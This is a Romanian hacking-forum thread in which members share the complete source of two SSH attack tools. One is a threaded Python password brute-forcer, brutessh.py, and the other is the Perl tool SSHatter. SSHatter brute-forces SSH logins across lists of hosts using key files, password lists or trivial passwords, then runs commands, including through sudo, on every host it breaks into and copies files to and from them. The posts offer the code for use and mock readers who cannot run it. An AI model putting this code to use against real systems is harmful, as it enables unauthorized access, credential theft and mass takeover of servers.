Nytro Posted December 15, 2010 Report Share Posted December 15, 2010 E luat de pe Backtrack.#!/usr/bin/pythonimport threadimport timefrom threading import Threadimport sys, os,threading, time, traceback, getoptimport paramikoimport terminalglobal adxglobal portadx="1"port=22data=[]i=[]term = terminal.TerminalController()paramiko.util.log_to_file('demo.log')print "\n*************************************"print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *"print "*Coded by Christian Martorella *"print "*Edge-Security Research *"print "*laramies@gmail.com *"print "*************************************\n"def usage(): print "Usage: brutessh.py options \n" print " -h: destination host\n" print " -u: username to force\n" print " -d: password file \n" print " -t: threads (default 12, more could be bad)\n\n" print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n" sys.exit()class force(Thread): def __init__( self, name ): Thread.__init__(self) self.name = name def run(self): global adx if adx == "1": passw=self.name.split("\n")[0] t = paramiko.Transport(hostname) try: t.start_client() except Exception: x = 0 try: t.auth_password(username=username,password=passw) except Exception: x = 0 if t.is_authenticated(): print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL t.close() adx = "0" else: print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL t.close() time.sleep(0) i[0]=i[0]-1def test_thread(names): i.append(0) j=0 while len(names): try: if i[0]<th: n = names.pop(0) i[0]=i[0]+1 thread=force(n) thread.start() j=j+1 except KeyboardInterrupt: print "Attack suspended by user..\n" sys.exit() thread.join()def test(argv): global th global hostname global username th = 12 if len(sys.argv) < 3: usage() try : opts, args = getopt.getopt(argv,"h:u:d:t:") except getopt.GetoptError: usage() for opt,arg in opts : if opt == '-u': username = arg elif opt == '-h': hostname =arg elif opt == '-d': password = arg elif opt == "-t": th = arg try: f = open(password, "r") except: print "Can't open password file\n" sys.exit() print term.RED + "HOST: " +term.NORMAL + hostname + term.RED + " Username: " +term.NORMAL + username +term.RED + " Password file: " +term.NORMAL+ password print "===========================================================================" print "Trying password...\n" name = f.readlines() starttime = time.clock() test_thread(name) stoptime = time.clock() print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime) print "\n"if __name__ == "__main__": try: test(sys.argv[1:]) except KeyboardInterrupt: print "Attack suspended by user...\n" sys.exit()Va descurcati. Daca nu sunteti in stare sa il folositi nici pe asta, lasati-va de astfel de prostii. (@ "hackerii de carton") Quote Link to comment Share on other sites More sharing options...
g3oflo Posted December 15, 2010 Report Share Posted December 15, 2010 ce direct ii omu Quote Link to comment Share on other sites More sharing options...
adi003user Posted December 15, 2010 Report Share Posted December 15, 2010 #!/usr/bin/perl -w# $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.12 2009-12-10 01:25:47 timb Exp $## Redistribution and use in source and binary forms, with or without# modification, are permitted provided that the following conditions are met:## * Redistributions of source code must retain the above copyright notice, this# list of conditions and the following disclaimer.# * Redistributions in binary form must reproduce the above copyright notice,# this list of conditions and the following disclaimer in the documentation# and/or other materials provided with the distribution.# * Neither the name of the Nth Dimension nor the names of its contributors may# be used to endorse or promote products derived from this software without# specific prior written permission.## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE# POSSIBILITY OF SUCH DAMAGE.## (c) Tim Brown, 2009# <mailto:timb@nth-dimension.org.uk># <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>use strict;package SSHatter::SSH::Host;use Net::SSH::Perl;sub new { my $class; my $self; $class = shift; $self = {}; bless($self, $class); $self->{'hostname'} = shift; $self->{'portnumber'} = shift; return $self;}sub info { my $self; $self = shift; return $self->{'hostname'} . ":" . $self->{'portnumber'};}sub pipe { my $self; $self = shift; pipe($self->{'readhandle'}, $self->{'writehandle'});}sub checkbykey { my $self; my $username; my $key; my $sshhandle; $self = shift; $username = shift; $key = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$key], options => ["PasswordAuthentication no"]); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username); $sshhandle->cmd("echo SSHatter"); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return 0; } } } return 1;}sub checkbypassword { my $self; my $username; my $password; my $sshhandle; $self = shift; $username = shift; $password = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username, $password); $sshhandle->cmd("echo SSHatter"); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return 0; } } } return 1;}sub writehandle { my $self; $self = shift; return $self->{'writehandle'};}sub readhandle { my $self; $self = shift; return $self->{'readhandle'};}sub unpipe { my $self; $self = shift; close($self->{'writehandle'});}sub addkey { my $self; my $username; my $key; $self = shift; $username = shift; $key = shift; $self->{'keys'}{$username} = $key;}sub addpassword { my $self; my $username; my $password; $self = shift; $username = shift; $password = shift; $self->{'passwords'}{$username} = $password;}sub usernamesbykey { my $self; $self = shift; return keys(%{$self->{'keys'}});}sub usernamesbypassword { my $self; $self = shift; return keys(%{$self->{'passwords'}});}sub key { my $self; my $username; $self = shift; $username = shift; return $self->{'keys'}{$username};}sub password { my $self; my $username; $self = shift; $username = shift; return $self->{'passwords'}{$username};}sub executebykey { my $self; my $username; my $commandstring; my $sshhandle; my @resultstrings; $self = shift; $username = shift; $commandstring = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$self->{'keys'}{$username}], options => ["PasswordAuthentication no"]); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { print "[" . $username . ":" . $self->{'keys'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n"; $sshhandle->login($username); @resultstrings = $sshhandle->cmd($commandstring); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return ("", "", -42); } } } return @resultstrings;}sub executebypassword { my $self; my $username; my $sudoflag; my $commandstring; my $sshhandle; my @resultstrings; $self = shift; $username = shift; $sudoflag = shift; $commandstring = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username, $self->{'passwords'}{$username}); print "[" . $username . ":" . $self->{'passwords'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n"; if (defined($sudoflag)) { @resultstrings = $sshhandle->cmd($commandstring, $self->{'passwords'}{$username} . "\n"); } else { @resultstrings = $sshhandle->cmd($commandstring); } }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return ("", "", -42); } } } return @resultstrings;}package SSHatter;use File::Basename;use Getopt::Std;use Parallel::ForkManager;my %argumentslist;my $maximumprocess;my $targetserverfilename;my $usernamefilename;my $keydirectoryname;my $passwordfilename;my $dumbflag;my $sudoflag;my $safeflag;my $masscommand;my $interactiveflag;my $localfilename;my $remotefilename;my $targetserverhandle;my $targetserverstring;my $hostname;my $portnumber;my $forkmanager;my $targetserver;my $processid;my $writehandle;my $usernamehandle;my $usernamestring;my $keyfilename;my $passwordhandle;my $passwordstring;my @targetservers;my $username;my $confirmresponse;my @resultstrings;my $nextcommand;my $localfilehandle;my $localfilebyte;my $localfiledata;sub parsetarget { my $targetserverstring; my $hostname; my $portnumber; $targetserverstring = shift; $targetserverstring =~ s/\x0a//g; ($hostname, $portnumber) = split(/:/, $targetserverstring); if ($portnumber && ($portnumber =~ /([0-9]+)/)) { $portnumber = $1; if (($portnumber <= 0) || ($portnumber > 65535)) { $portnumber = 22; } } else { $portnumber = 22; } return ($hostname, $portnumber);}sub main::HELP_MESSAGE { die "usage: " . basename($0) . " -x <maximumprocess> -t <targetserverfilename> -u <usernamefilename> <[-k <keydirectoryname>] [-p <passwordfilename>] [-d]> [[-0] [-s] -m <masscommand> | [-0] [-s] -i | -P <localfilename> | -G <remotefilename>] -d - dumb mode, try username equals password, username, blank -0 - sudo mode, echo the password to STDIN (useful for systems where sudo -S works) -s - safe mode, prompt before executing -m - mass mode, run one command across all targets -i - interactive mode, run multiple commands across all targets (non-persistant) -P - upload a file -G - download a fileIf sudo mode is not enabled, then " . $0 . " will block on STDIN.";}sub main::VERSION_MESSAGE { print basename($0) . " 1.0\n";}$Getopt::Std::STANDARD_HELP_VERSION = 1;getopts("x:t:u:k:p:d0sm:iP:G:", \%argumentslist);if (defined($argumentslist{'x'}) && ($argumentslist{'x'} =~ /([0-9]+)/)) { $maximumprocess = $1;} else { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'t'}) && (-e $argumentslist{'t'})) { $targetserverfilename = $argumentslist{'t'};} else { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'u'}) && (-e $argumentslist{'u'})) { $usernamefilename = $argumentslist{'u'};} else { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'k'}) && (-e $argumentslist{'k'})) { $keydirectoryname = $argumentslist{'k'};}if (defined($argumentslist{'p'}) && (-e $argumentslist{'p'})) { $passwordfilename = $argumentslist{'p'};}if (defined($argumentslist{'d'})) { $dumbflag = 1;}if (!defined($keydirectoryname) && !defined($passwordfilename) && !defined($dumbflag)) { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'0'})) { $sudoflag = 1;}if (defined($argumentslist{'s'})) { $safeflag = 1;}if (defined($argumentslist{'m'})) { $masscommand = $argumentslist{'m'};} else { if (defined($argumentslist{'i'})) { $interactiveflag = 1; } else { if (defined($argumentslist{'P'})) { if (-e $argumentslist{'P'}) { $localfilename = $argumentslist{'P'}; } else { Getopt::Std::help_mess("", "main"); } } else { if (defined($argumentslist{'G'})) { $remotefilename = $argumentslist{'G'}; } } }}$forkmanager = Parallel::ForkManager->new($maximumprocess);$forkmanager->run_on_finish(sub { my $processid; my $returncode; my $targetserver; my $readhandle; my $readdata; my $credentialtype; my $username; my $credentialstring; $processid = shift; $returncode = shift; $targetserver = shift; $targetserver->unpipe(); $readhandle = $targetserver->readhandle(); while ($readdata = <$readhandle>) { $readdata =~ s/\x0a//g; ($credentialtype, $username, $credentialstring) = split(/ /, $readdata); if ($credentialtype eq "K") { $targetserver->addkey($username, $credentialstring); } else { $targetserver->addpassword($username, $credentialstring); } } close($readhandle); print STDERR "I: " . $targetserver->info() . " finished\n";});open($targetserverhandle, "<" . $targetserverfilename);while ($targetserverstring = <$targetserverhandle>) { ($hostname, $portnumber) = parsetarget($targetserverstring); $targetserver = SSHatter::SSH::Host->new($hostname, $portnumber); print STDERR "I: " . $targetserver->info() . "\n"; push(@targetservers, $targetserver); $targetserver->pipe(); $processid = $forkmanager->start($targetserver) and next; $writehandle = $targetserver->writehandle(); open($usernamehandle, "<" . $usernamefilename); while ($usernamestring = <$usernamehandle>) { $usernamestring =~ s/\x0a//g; if (defined($keydirectoryname)) { while ($keyfilename = <$keydirectoryname/*>) { if ($targetserver->checkbykey($usernamestring, $keyfilename) == 1) { print $writehandle "K" . " " . $usernamestring . " " . $keyfilename . "\n"; } } } if (defined($passwordfilename)) { open($passwordhandle, "<" . $passwordfilename); while ($passwordstring = <$passwordhandle>) { $passwordstring =~ s/\x0a//g; if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } close($passwordhandle); } if (defined($dumbflag)) { foreach $passwordstring (("", "password", $usernamestring)) { if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } } } close($usernamehandle); $forkmanager->finish();}close($targetserverhandle);$forkmanager->wait_all_children();foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { print $username . ":" . $targetserver->key($username) . "@" . $targetserver->info() . "\n"; } foreach $username ($targetserver->usernamesbypassword()) { print $username . ":" . $targetserver->password($username) . "@" . $targetserver->info() . "\n"; }}if ((defined($masscommand) || defined($interactiveflag)) && defined($safeflag)) { print "W: executing " . (defined($masscommand) ? $masscommand : "in interactive mode") . ", continue? [y/N] "; $confirmresponse = <>; if ($confirmresponse !~ /^[Yy]/) { exit(1); }}if (defined($masscommand)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } }} else { if (defined($interactiveflag)) { print "\$ "; while ($nextcommand = <>) { $nextcommand =~ s/\x0a//g; if ($nextcommand eq "exit") { last; } else { if ($nextcommand =~ /put (.*)/) { open($localfilehandle, "<" . $1); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if ($nextcommand =~ /get (.*)/) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } else { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } } } print "\$ "; } } else { if (defined($localfilename)) { open($localfilehandle, "<" . $localfilename); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if (defined($remotefilename)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } } }}exit(1);sshatter Quote Link to comment Share on other sites More sharing options...
